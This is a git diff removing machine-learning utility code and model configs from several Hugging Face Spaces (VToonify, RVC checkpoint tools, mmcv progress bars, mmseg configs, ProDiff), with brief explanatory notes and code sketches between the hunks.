-
- feat0 = self.layers[0](feat0, feat1, mask0, mask1)
- feat1 = self.layers[1](feat1, feat0, mask1, mask0)
-
- return feat0, feat1
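-
-
-if __name__ == "__main__":
-    # Minimal smoke test; the config values below are illustrative assumptions,
-    # not the settings shipped with TopicFM.
-    cfg = {
-        "d_model": 256,
-        "nhead": 8,
-        "layer_names": ["self", "cross"],
-        "attention": "linear",
-    }
-    model = LocalFeatureTransformer(cfg)
-    feat0, feat1 = torch.randn(1, 100, 256), torch.randn(1, 120, 256)
-    out0, out1 = model(feat0, feat1)
-    print(out0.shape, out1.shape)  # expected: [1, 100, 256] and [1, 120, 256]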
diff --git a/spaces/Reha2704/VToonify/vtoonify/util.py b/spaces/Reha2704/VToonify/vtoonify/util.py
deleted file mode 100644
index 01ad2930c55d07866dee02e019d359bb78f65fc7..0000000000000000000000000000000000000000
--- a/spaces/Reha2704/VToonify/vtoonify/util.py
+++ /dev/null
@@ -1,229 +0,0 @@
-import numpy as np
-import matplotlib.pyplot as plt
-from PIL import Image
-import cv2
-import random
-import math
-import argparse
-import torch
-from torch.utils import data
-from torch.nn import functional as F
-from torch import autograd
-from torch.nn import init
-import torchvision.transforms as transforms
-from model.stylegan.op import conv2d_gradfix
-from model.encoder.encoders.psp_encoders import GradualStyleEncoder
-from model.encoder.align_all_parallel import get_landmark
-
-def visualize(img_arr, dpi):
- plt.figure(figsize=(10,10),dpi=dpi)
- plt.imshow(((img_arr.detach().cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8))
- plt.axis('off')
- plt.show()
-
-def save_image(img, filename):
- tmp = ((img.detach().cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8)
- cv2.imwrite(filename, cv2.cvtColor(tmp, cv2.COLOR_RGB2BGR))
-
-def load_image(filename):
- transform = transforms.Compose([
- transforms.ToTensor(),
- transforms.Normalize(mean=[0.5, 0.5, 0.5],std=[0.5,0.5,0.5]),
- ])
-
- img = Image.open(filename)
- img = transform(img)
- return img.unsqueeze(dim=0)
-
-def data_sampler(dataset, shuffle, distributed):
- if distributed:
- return data.distributed.DistributedSampler(dataset, shuffle=shuffle)
-
- if shuffle:
- return data.RandomSampler(dataset)
-
- else:
- return data.SequentialSampler(dataset)
-
-
-def requires_grad(model, flag=True):
- for p in model.parameters():
- p.requires_grad = flag
-
-
-def accumulate(model1, model2, decay=0.999):
- par1 = dict(model1.named_parameters())
- par2 = dict(model2.named_parameters())
-
- for k in par1.keys():
- par1[k].data.mul_(decay).add_(par2[k].data, alpha=1 - decay)
-
-
-def sample_data(loader):
- while True:
- for batch in loader:
- yield batch
-
-
-def d_logistic_loss(real_pred, fake_pred):
- real_loss = F.softplus(-real_pred)
- fake_loss = F.softplus(fake_pred)
-
- return real_loss.mean() + fake_loss.mean()
-
-
-def d_r1_loss(real_pred, real_img):
- with conv2d_gradfix.no_weight_gradients():
- grad_real, = autograd.grad(
- outputs=real_pred.sum(), inputs=real_img, create_graph=True
- )
- grad_penalty = grad_real.pow(2).reshape(grad_real.shape[0], -1).sum(1).mean()
-
- return grad_penalty
-
-
-def g_nonsaturating_loss(fake_pred):
- loss = F.softplus(-fake_pred).mean()
-
- return loss
-
-
-def g_path_regularize(fake_img, latents, mean_path_length, decay=0.01):
- noise = torch.randn_like(fake_img) / math.sqrt(
- fake_img.shape[2] * fake_img.shape[3]
- )
- grad, = autograd.grad(
- outputs=(fake_img * noise).sum(), inputs=latents, create_graph=True
- )
- path_lengths = torch.sqrt(grad.pow(2).sum(2).mean(1))
-
- path_mean = mean_path_length + decay * (path_lengths.mean() - mean_path_length)
-
- path_penalty = (path_lengths - path_mean).pow(2).mean()
-
- return path_penalty, path_mean.detach(), path_lengths
-
-
-def make_noise(batch, latent_dim, n_noise, device):
- if n_noise == 1:
- return torch.randn(batch, latent_dim, device=device)
-
- noises = torch.randn(n_noise, batch, latent_dim, device=device).unbind(0)
-
- return noises
-
-
-def mixing_noise(batch, latent_dim, prob, device):
- if prob > 0 and random.random() < prob:
- return make_noise(batch, latent_dim, 2, device)
-
- else:
- return [make_noise(batch, latent_dim, 1, device)]
-
-
-def set_grad_none(model, targets):
- for n, p in model.named_parameters():
- if n in targets:
- p.grad = None
-
-
-def weights_init(m):
- classname = m.__class__.__name__
- if classname.find('BatchNorm2d') != -1:
- if hasattr(m, 'weight') and m.weight is not None:
- init.normal_(m.weight.data, 1.0, 0.02)
- if hasattr(m, 'bias') and m.bias is not None:
- init.constant_(m.bias.data, 0.0)
- elif hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):
- init.kaiming_normal_(m.weight.data, a=0, mode='fan_in')
- if hasattr(m, 'bias') and m.bias is not None:
- init.constant_(m.bias.data, 0.0)
-
-
-def load_psp_standalone(checkpoint_path, device='cuda'):
- ckpt = torch.load(checkpoint_path, map_location='cpu')
- opts = ckpt['opts']
- if 'output_size' not in opts:
- opts['output_size'] = 1024
- opts['n_styles'] = int(math.log(opts['output_size'], 2)) * 2 - 2
- opts = argparse.Namespace(**opts)
- psp = GradualStyleEncoder(50, 'ir_se', opts)
- psp_dict = {k.replace('encoder.', ''): v for k, v in ckpt['state_dict'].items() if k.startswith('encoder.')}
- psp.load_state_dict(psp_dict)
- psp.eval()
- psp = psp.to(device)
- latent_avg = ckpt['latent_avg'].to(device)
-
- def add_latent_avg(model, inputs, outputs):
- return outputs + latent_avg.repeat(outputs.shape[0], 1, 1)
-
- psp.register_forward_hook(add_latent_avg)
- return psp
-
-def get_video_crop_parameter(filepath, predictor, padding=[200,200,200,200]):
- if type(filepath) == str:
- img = dlib.load_rgb_image(filepath)
- else:
- img = filepath
- lm = get_landmark(img, predictor)
- if lm is None:
- return None
- lm_chin = lm[0 : 17] # left-right
- lm_eyebrow_left = lm[17 : 22] # left-right
- lm_eyebrow_right = lm[22 : 27] # left-right
- lm_nose = lm[27 : 31] # top-down
- lm_nostrils = lm[31 : 36] # top-down
- lm_eye_left = lm[36 : 42] # left-clockwise
- lm_eye_right = lm[42 : 48] # left-clockwise
- lm_mouth_outer = lm[48 : 60] # left-clockwise
- lm_mouth_inner = lm[60 : 68] # left-clockwise
-
- scale = 64. / (np.mean(lm_eye_right[:,0])-np.mean(lm_eye_left[:,0]))
- center = ((np.mean(lm_eye_right, axis=0)+np.mean(lm_eye_left, axis=0)) / 2) * scale
- h, w = round(img.shape[0] * scale), round(img.shape[1] * scale)
- left = max(round(center[0] - padding[0]), 0) // 8 * 8
- right = min(round(center[0] + padding[1]), w) // 8 * 8
- top = max(round(center[1] - padding[2]), 0) // 8 * 8
- bottom = min(round(center[1] + padding[3]), h) // 8 * 8
- return h,w,top,bottom,left,right,scale
-
-def tensor2cv2(img):
- tmp = ((img.cpu().numpy().transpose(1, 2, 0) + 1.0) * 127.5).astype(np.uint8)
- return cv2.cvtColor(tmp, cv2.COLOR_RGB2BGR)
-
-# get parameters from the stylegan and mark them with their layers
-def gather_params(G):
- params = dict(
- [(res, {}) for res in range(18)] + [("others", {})]
- )
- for n, p in sorted(list(G.named_buffers()) + list(G.named_parameters())):
- if n.startswith("convs"):
- layer = int(n.split(".")[1]) + 1
- params[layer][n] = p
- elif n.startswith("to_rgbs"):
- layer = int(n.split(".")[1]) * 2 + 3
- params[layer][n] = p
- elif n.startswith("conv1"):
- params[0][n] = p
- elif n.startswith("to_rgb1"):
- params[1][n] = p
- else:
- params["others"][n] = p
- return params
-
-# blend the ffhq stylegan model and the finetuned model for toonify
-# see ``Resolution Dependent GAN Interpolation for Controllable Image Synthesis Between Domains''
-def blend_models(G_low, G_high, weight=[1]*7+[0]*11):
- params_low = gather_params(G_low)
- params_high = gather_params(G_high)
-
- for res in range(18):
- for n, p in params_high[res].items():
- params_high[res][n] = params_high[res][n] * (1-weight[res]) + params_low[res][n] * weight[res]
-
- state_dict = {}
- for _, p in params_high.items():
- state_dict.update(p)
-
- return state_dict
-
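The `blend_models` helper above interpolates a coarse (FFHQ) StyleGAN and a finetuned one layer group by layer group, following the resolution-dependent interpolation idea it cites. The following is a minimal sketch of the same per-layer linear blend applied to plain state dicts; the function name and weight scheme are illustrative, not the VToonify API.

```python
import torch

def blend_state_dicts(sd_low, sd_high, weight_of_low):
    """Per-parameter linear interpolation of two state dicts with identical keys.

    weight_of_low[name] in [0, 1] is the share taken from sd_low for that
    parameter (e.g. 1.0 for coarse layers, 0.0 for fine layers).
    """
    return {
        name: p_high * (1.0 - weight_of_low.get(name, 0.0))
        + sd_low[name] * weight_of_low.get(name, 0.0)
        for name, p_high in sd_high.items()
    }

if __name__ == "__main__":
    low = {"conv.weight": torch.zeros(3, 3)}
    high = {"conv.weight": torch.ones(3, 3)}
    out = blend_state_dicts(low, high, {"conv.weight": 0.25})
    print(out["conv.weight"][0, 0].item())  # 0.75
```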
diff --git a/spaces/Ricecake123/RVC-demo/train/process_ckpt.py b/spaces/Ricecake123/RVC-demo/train/process_ckpt.py
deleted file mode 100644
index 8f9c3d74d6a73a2d0a6a6bc9a592bea01e1c820e..0000000000000000000000000000000000000000
--- a/spaces/Ricecake123/RVC-demo/train/process_ckpt.py
+++ /dev/null
@@ -1,259 +0,0 @@
-import torch, traceback, os, pdb, sys
-
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-from collections import OrderedDict
-from i18n import I18nAuto
-
-i18n = I18nAuto()
-
-
-def savee(ckpt, sr, if_f0, name, epoch, version, hps):
- try:
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = ckpt[key].half()
- opt["config"] = [
- hps.data.filter_length // 2 + 1,
- 32,
- hps.model.inter_channels,
- hps.model.hidden_channels,
- hps.model.filter_channels,
- hps.model.n_heads,
- hps.model.n_layers,
- hps.model.kernel_size,
- hps.model.p_dropout,
- hps.model.resblock,
- hps.model.resblock_kernel_sizes,
- hps.model.resblock_dilation_sizes,
- hps.model.upsample_rates,
- hps.model.upsample_initial_channel,
- hps.model.upsample_kernel_sizes,
- hps.model.spk_embed_dim,
- hps.model.gin_channels,
- hps.data.sampling_rate,
- ]
- opt["info"] = "%sepoch" % epoch
- opt["sr"] = sr
- opt["f0"] = if_f0
- opt["version"] = version
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def show_info(path):
- try:
- a = torch.load(path, map_location="cpu")
- return "Model info: %s\nSample rate: %s\nPitch guidance (f0): %s\nVersion: %s" % (
- a.get("info", "None"),
- a.get("sr", "None"),
- a.get("f0", "None"),
- a.get("version", "None"),
- )
- except:
- return traceback.format_exc()
-
-
-def extract_small_model(path, name, sr, if_f0, info, version):
- try:
- ckpt = torch.load(path, map_location="cpu")
- if "model" in ckpt:
- ckpt = ckpt["model"]
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = ckpt[key].half()
- if sr == "40k":
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 10, 2, 2],
- 512,
- [16, 16, 4, 4],
- 109,
- 256,
- 40000,
- ]
- elif sr == "48k":
- if version == "v1":
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 6, 2, 2, 2],
- 512,
- [16, 16, 4, 4, 4],
- 109,
- 256,
- 48000,
- ]
- else:
- opt["config"] = [
- 1025,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [12, 10, 2, 2],
- 512,
- [24, 20, 4, 4],
- 109,
- 256,
- 48000,
- ]
- elif sr == "32k":
- if version == "v1":
- opt["config"] = [
- 513,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 4, 2, 2, 2],
- 512,
- [16, 16, 4, 4, 4],
- 109,
- 256,
- 32000,
- ]
- else:
- opt["config"] = [
- 513,
- 32,
- 192,
- 192,
- 768,
- 2,
- 6,
- 3,
- 0,
- "1",
- [3, 7, 11],
- [[1, 3, 5], [1, 3, 5], [1, 3, 5]],
- [10, 8, 2, 2],
- 512,
- [20, 16, 4, 4],
- 109,
- 256,
- 32000,
- ]
- if info == "":
- info = "Extracted model."
- opt["info"] = info
- opt["version"] = version
- opt["sr"] = sr
- opt["f0"] = int(if_f0)
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def change_info(path, info, name):
- try:
- ckpt = torch.load(path, map_location="cpu")
- ckpt["info"] = info
- if name == "":
- name = os.path.basename(path)
- torch.save(ckpt, "weights/%s" % name)
- return "Success."
- except:
- return traceback.format_exc()
-
-
-def merge(path1, path2, alpha1, sr, f0, info, name, version):
- try:
-
- def extract(ckpt):
- a = ckpt["model"]
- opt = OrderedDict()
- opt["weight"] = {}
- for key in a.keys():
- if "enc_q" in key:
- continue
- opt["weight"][key] = a[key]
- return opt
-
- ckpt1 = torch.load(path1, map_location="cpu")
- ckpt2 = torch.load(path2, map_location="cpu")
- cfg = ckpt1["config"]
- if "model" in ckpt1:
- ckpt1 = extract(ckpt1)
- else:
- ckpt1 = ckpt1["weight"]
- if "model" in ckpt2:
- ckpt2 = extract(ckpt2)
- else:
- ckpt2 = ckpt2["weight"]
- if sorted(list(ckpt1.keys())) != sorted(list(ckpt2.keys())):
- return "Fail to merge the models. The model architectures are not the same."
- opt = OrderedDict()
- opt["weight"] = {}
- for key in ckpt1.keys():
- # try:
- if key == "emb_g.weight" and ckpt1[key].shape != ckpt2[key].shape:
- min_shape0 = min(ckpt1[key].shape[0], ckpt2[key].shape[0])
- opt["weight"][key] = (
- alpha1 * (ckpt1[key][:min_shape0].float())
- + (1 - alpha1) * (ckpt2[key][:min_shape0].float())
- ).half()
- else:
- opt["weight"][key] = (
- alpha1 * (ckpt1[key].float()) + (1 - alpha1) * (ckpt2[key].float())
- ).half()
- # except:
- # pdb.set_trace()
- opt["config"] = cfg
- """
- if(sr=="40k"):opt["config"] = [1025, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10, 10, 2, 2], 512, [16, 16, 4, 4,4], 109, 256, 40000]
- elif(sr=="48k"):opt["config"] = [1025, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10,6,2,2,2], 512, [16, 16, 4, 4], 109, 256, 48000]
- elif(sr=="32k"):opt["config"] = [513, 32, 192, 192, 768, 2, 6, 3, 0, "1", [3, 7, 11], [[1, 3, 5], [1, 3, 5], [1, 3, 5]], [10, 4, 2, 2, 2], 512, [16, 16, 4, 4,4], 109, 256, 32000]
- """
- opt["sr"] = sr
- opt["f0"] = 1 if f0 == i18n("是") else 0
- opt["version"] = version
- opt["info"] = info
- torch.save(opt, "weights/%s.pth" % name)
- return "Success."
- except:
- return traceback.format_exc()
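The `merge` function above combines two RVC checkpoints by linearly interpolating every shared weight tensor with the mixing factor `alpha1` and storing the result in half precision. A stripped-down sketch of that interpolation, assuming two weight dicts with matching keys (the names used here are illustrative):

```python
from collections import OrderedDict
import torch

def interpolate_weights(w1, w2, alpha):
    """Return alpha * w1 + (1 - alpha) * w2 for every key, stored as fp16."""
    if sorted(w1) != sorted(w2):
        raise ValueError("Cannot merge: the two models have different architectures.")
    out = OrderedDict()
    for key in w1:
        out[key] = (alpha * w1[key].float() + (1 - alpha) * w2[key].float()).half()
    return out

if __name__ == "__main__":
    w_a = {"linear.weight": torch.full((2, 2), 1.0)}
    w_b = {"linear.weight": torch.full((2, 2), 3.0)}
    print(interpolate_weights(w_a, w_b, alpha=0.5)["linear.weight"])  # all 2.0 (fp16)
```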
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py
deleted file mode 100644
index 2c934939fac48525f22ad86f489a041dd7db7d09..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/configs/_base_/models/danet_r50-d8.py
+++ /dev/null
@@ -1,44 +0,0 @@
-# model settings
-norm_cfg = dict(type='SyncBN', requires_grad=True)
-model = dict(
- type='EncoderDecoder',
- pretrained='open-mmlab://resnet50_v1c',
- backbone=dict(
- type='ResNetV1c',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- dilations=(1, 1, 2, 4),
- strides=(1, 2, 1, 1),
- norm_cfg=norm_cfg,
- norm_eval=False,
- style='pytorch',
- contract_dilation=True),
- decode_head=dict(
- type='DAHead',
- in_channels=2048,
- in_index=3,
- channels=512,
- pam_channels=64,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
- auxiliary_head=dict(
- type='FCNHead',
- in_channels=1024,
- in_index=2,
- channels=256,
- num_convs=1,
- concat_input=False,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
- # model training and testing settings
- train_cfg=dict(),
- test_cfg=dict(mode='whole'))
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py
deleted file mode 100644
index 0062f670dd94fa9da559ab26ef85517dcf5211c7..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmcv/utils/progressbar.py
+++ /dev/null
@@ -1,208 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-import sys
-from collections.abc import Iterable
-from multiprocessing import Pool
-from shutil import get_terminal_size
-
-from .timer import Timer
-
-
-class ProgressBar:
- """A progress bar which can print the progress."""
-
- def __init__(self, task_num=0, bar_width=50, start=True, file=sys.stdout):
- self.task_num = task_num
- self.bar_width = bar_width
- self.completed = 0
- self.file = file
- if start:
- self.start()
-
- @property
- def terminal_width(self):
- width, _ = get_terminal_size()
- return width
-
- def start(self):
- if self.task_num > 0:
- self.file.write(f'[{" " * self.bar_width}] 0/{self.task_num}, '
- 'elapsed: 0s, ETA:')
- else:
- self.file.write('completed: 0, elapsed: 0s')
- self.file.flush()
- self.timer = Timer()
-
- def update(self, num_tasks=1):
- assert num_tasks > 0
- self.completed += num_tasks
- elapsed = self.timer.since_start()
- if elapsed > 0:
- fps = self.completed / elapsed
- else:
- fps = float('inf')
- if self.task_num > 0:
- percentage = self.completed / float(self.task_num)
- eta = int(elapsed * (1 - percentage) / percentage + 0.5)
- msg = f'\r[{{}}] {self.completed}/{self.task_num}, ' \
- f'{fps:.1f} task/s, elapsed: {int(elapsed + 0.5)}s, ' \
- f'ETA: {eta:5}s'
-
- bar_width = min(self.bar_width,
- int(self.terminal_width - len(msg)) + 2,
- int(self.terminal_width * 0.6))
- bar_width = max(2, bar_width)
- mark_width = int(bar_width * percentage)
- bar_chars = '>' * mark_width + ' ' * (bar_width - mark_width)
- self.file.write(msg.format(bar_chars))
- else:
- self.file.write(
- f'completed: {self.completed}, elapsed: {int(elapsed + 0.5)}s,'
- f' {fps:.1f} tasks/s')
- self.file.flush()
-
-
-def track_progress(func, tasks, bar_width=50, file=sys.stdout, **kwargs):
- """Track the progress of tasks execution with a progress bar.
-
- Tasks are done with a simple for-loop.
-
- Args:
- func (callable): The function to be applied to each task.
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- bar_width (int): Width of progress bar.
-
- Returns:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- prog_bar = ProgressBar(task_num, bar_width, file=file)
- results = []
- for task in tasks:
- results.append(func(task, **kwargs))
- prog_bar.update()
- prog_bar.file.write('\n')
- return results
-
-
-def init_pool(process_num, initializer=None, initargs=None):
- if initializer is None:
- return Pool(process_num)
- elif initargs is None:
- return Pool(process_num, initializer)
- else:
- if not isinstance(initargs, tuple):
- raise TypeError('"initargs" must be a tuple')
- return Pool(process_num, initializer, initargs)
-
-
-def track_parallel_progress(func,
- tasks,
- nproc,
- initializer=None,
- initargs=None,
- bar_width=50,
- chunksize=1,
- skip_first=False,
- keep_order=True,
- file=sys.stdout):
- """Track the progress of parallel task execution with a progress bar.
-
- The built-in :mod:`multiprocessing` module is used for process pools and
- tasks are done with :func:`Pool.map` or :func:`Pool.imap_unordered`.
-
- Args:
- func (callable): The function to be applied to each task.
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- nproc (int): Process (worker) number.
- initializer (None or callable): Refer to :class:`multiprocessing.Pool`
- for details.
- initargs (None or tuple): Refer to :class:`multiprocessing.Pool` for
- details.
- chunksize (int): Refer to :class:`multiprocessing.Pool` for details.
- bar_width (int): Width of progress bar.
- skip_first (bool): Whether to skip the first sample for each worker
- when estimating fps, since the initialization step may take
- longer.
- keep_order (bool): If True, :func:`Pool.imap` is used, otherwise
- :func:`Pool.imap_unordered` is used.
-
- Returns:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- pool = init_pool(nproc, initializer, initargs)
- start = not skip_first
- task_num -= nproc * chunksize * int(skip_first)
- prog_bar = ProgressBar(task_num, bar_width, start, file=file)
- results = []
- if keep_order:
- gen = pool.imap(func, tasks, chunksize)
- else:
- gen = pool.imap_unordered(func, tasks, chunksize)
- for result in gen:
- results.append(result)
- if skip_first:
- if len(results) < nproc * chunksize:
- continue
- elif len(results) == nproc * chunksize:
- prog_bar.start()
- continue
- prog_bar.update()
- prog_bar.file.write('\n')
- pool.close()
- pool.join()
- return results
-
-
-def track_iter_progress(tasks, bar_width=50, file=sys.stdout):
- """Track the progress of tasks iteration or enumeration with a progress
- bar.
-
- Tasks are yielded with a simple for-loop.
-
- Args:
- tasks (list or tuple[Iterable, int]): A list of tasks or
- (tasks, total num).
- bar_width (int): Width of progress bar.
-
- Yields:
- list: The task results.
- """
- if isinstance(tasks, tuple):
- assert len(tasks) == 2
- assert isinstance(tasks[0], Iterable)
- assert isinstance(tasks[1], int)
- task_num = tasks[1]
- tasks = tasks[0]
- elif isinstance(tasks, Iterable):
- task_num = len(tasks)
- else:
- raise TypeError(
- '"tasks" must be an iterable object or a (iterator, int) tuple')
- prog_bar = ProgressBar(task_num, bar_width, file=file)
- for task in tasks:
- yield task
- prog_bar.update()
- prog_bar.file.write('\n')
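For reference, the helpers defined in this deleted module mirror the progress utilities that `mmcv.utils` exports under the same names, so a hedged usage sketch (assuming mmcv < 2.0 is installed) would look like this:

```python
import time
from mmcv.utils import track_progress, track_iter_progress  # same API as the module above

def slow_square(x):
    time.sleep(0.01)
    return x * x

# Apply a function to each task with a progress bar; returns the list of results.
results = track_progress(slow_square, list(range(50)))

# Or simply wrap an iterable to get a progress bar while looping over it.
for _ in track_iter_progress(list(range(50))):
    time.sleep(0.01)
```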
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py
deleted file mode 100644
index 35758f4f4e3b2bddd460edb8a7f482b3a9da2919..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer/mmdet/models/roi_heads/bbox_heads/scnet_bbox_head.py
+++ /dev/null
@@ -1,76 +0,0 @@
-from mmdet.models.builder import HEADS
-from .convfc_bbox_head import ConvFCBBoxHead
-
-
-@HEADS.register_module()
-class SCNetBBoxHead(ConvFCBBoxHead):
- """BBox head for `SCNet `_.
-
- This inherits ``ConvFCBBoxHead`` with a modified forward() function that allows us
- to get the intermediate shared feature.
- """
-
- def _forward_shared(self, x):
- """Forward function for shared part."""
- if self.num_shared_convs > 0:
- for conv in self.shared_convs:
- x = conv(x)
-
- if self.num_shared_fcs > 0:
- if self.with_avg_pool:
- x = self.avg_pool(x)
-
- x = x.flatten(1)
-
- for fc in self.shared_fcs:
- x = self.relu(fc(x))
-
- return x
-
- def _forward_cls_reg(self, x):
- """Forward function for classification and regression parts."""
- x_cls = x
- x_reg = x
-
- for conv in self.cls_convs:
- x_cls = conv(x_cls)
- if x_cls.dim() > 2:
- if self.with_avg_pool:
- x_cls = self.avg_pool(x_cls)
- x_cls = x_cls.flatten(1)
- for fc in self.cls_fcs:
- x_cls = self.relu(fc(x_cls))
-
- for conv in self.reg_convs:
- x_reg = conv(x_reg)
- if x_reg.dim() > 2:
- if self.with_avg_pool:
- x_reg = self.avg_pool(x_reg)
- x_reg = x_reg.flatten(1)
- for fc in self.reg_fcs:
- x_reg = self.relu(fc(x_reg))
-
- cls_score = self.fc_cls(x_cls) if self.with_cls else None
- bbox_pred = self.fc_reg(x_reg) if self.with_reg else None
-
- return cls_score, bbox_pred
-
- def forward(self, x, return_shared_feat=False):
- """Forward function.
-
- Args:
- x (Tensor): input features
- return_shared_feat (bool): If True, return cls-reg-shared feature.
-
- Return:
- out (tuple[Tensor]): contain ``cls_score`` and ``bbox_pred``,
- if ``return_shared_feat`` is True, append ``x_shared`` to the
- returned tuple.
- """
- x_shared = self._forward_shared(x)
- out = self._forward_cls_reg(x_shared)
-
- if return_shared_feat:
- out += (x_shared, )
-
- return out
diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py
deleted file mode 100644
index 10974962fdd7136031fd06de1700f497d355ceaa..0000000000000000000000000000000000000000
--- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/configs/_base_/models/upernet_r50.py
+++ /dev/null
@@ -1,44 +0,0 @@
-# model settings
-norm_cfg = dict(type='SyncBN', requires_grad=True)
-model = dict(
- type='EncoderDecoder',
- pretrained='open-mmlab://resnet50_v1c',
- backbone=dict(
- type='ResNetV1c',
- depth=50,
- num_stages=4,
- out_indices=(0, 1, 2, 3),
- dilations=(1, 1, 1, 1),
- strides=(1, 2, 2, 2),
- norm_cfg=norm_cfg,
- norm_eval=False,
- style='pytorch',
- contract_dilation=True),
- decode_head=dict(
- type='UPerHead',
- in_channels=[256, 512, 1024, 2048],
- in_index=[0, 1, 2, 3],
- pool_scales=(1, 2, 3, 6),
- channels=512,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)),
- auxiliary_head=dict(
- type='FCNHead',
- in_channels=1024,
- in_index=2,
- channels=256,
- num_convs=1,
- concat_input=False,
- dropout_ratio=0.1,
- num_classes=19,
- norm_cfg=norm_cfg,
- align_corners=False,
- loss_decode=dict(
- type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)),
- # model training and testing settings
- train_cfg=dict(),
- test_cfg=dict(mode='whole'))
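Configs like the one above are plain Python dicts that downstream code reads with mmcv's `Config` loader. A small, hedged example of inspecting and overriding this file (the path is shown as it appeared before deletion, and mmcv < 2.0 is assumed for the top-level `Config` import):

```python
from mmcv import Config  # mmcv < 2.0 exposes the Config loader at top level

# Hypothetical path: the file shown above, relative to the Space's repo root.
cfg = Config.fromfile(
    "annotator/uniformer_base/configs/_base_/models/upernet_r50.py")

print(cfg.model.decode_head.type)         # 'UPerHead'
print(cfg.model.decode_head.num_classes)  # 19

# Typical override before building a model for a dataset with more classes.
cfg.model.decode_head.num_classes = 150
cfg.model.auxiliary_head.num_classes = 150
```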
diff --git a/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py b/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py
deleted file mode 100644
index 76a94ed6abe22e349c51c49afdbf052d52b8d98b..0000000000000000000000000000000000000000
--- a/spaces/Rongjiehuang/ProDiff/utils/pl_utils.py
+++ /dev/null
@@ -1,1618 +0,0 @@
-import matplotlib
-from torch.nn import DataParallel
-from torch.nn.parallel import DistributedDataParallel
-
-matplotlib.use('Agg')
-import glob
-import itertools
-import subprocess
-import threading
-import traceback
-
-from pytorch_lightning.callbacks import GradientAccumulationScheduler
-from pytorch_lightning.callbacks import ModelCheckpoint
-
-from functools import wraps
-from torch.cuda._utils import _get_device_index
-import numpy as np
-import torch.optim
-import torch.utils.data
-import copy
-import logging
-import os
-import re
-import sys
-import torch
-import torch.distributed as dist
-import torch.multiprocessing as mp
-import tqdm
-from torch.optim.optimizer import Optimizer
-
-
-def get_a_var(obj): # pragma: no cover
- if isinstance(obj, torch.Tensor):
- return obj
-
- if isinstance(obj, list) or isinstance(obj, tuple):
- for result in map(get_a_var, obj):
- if isinstance(result, torch.Tensor):
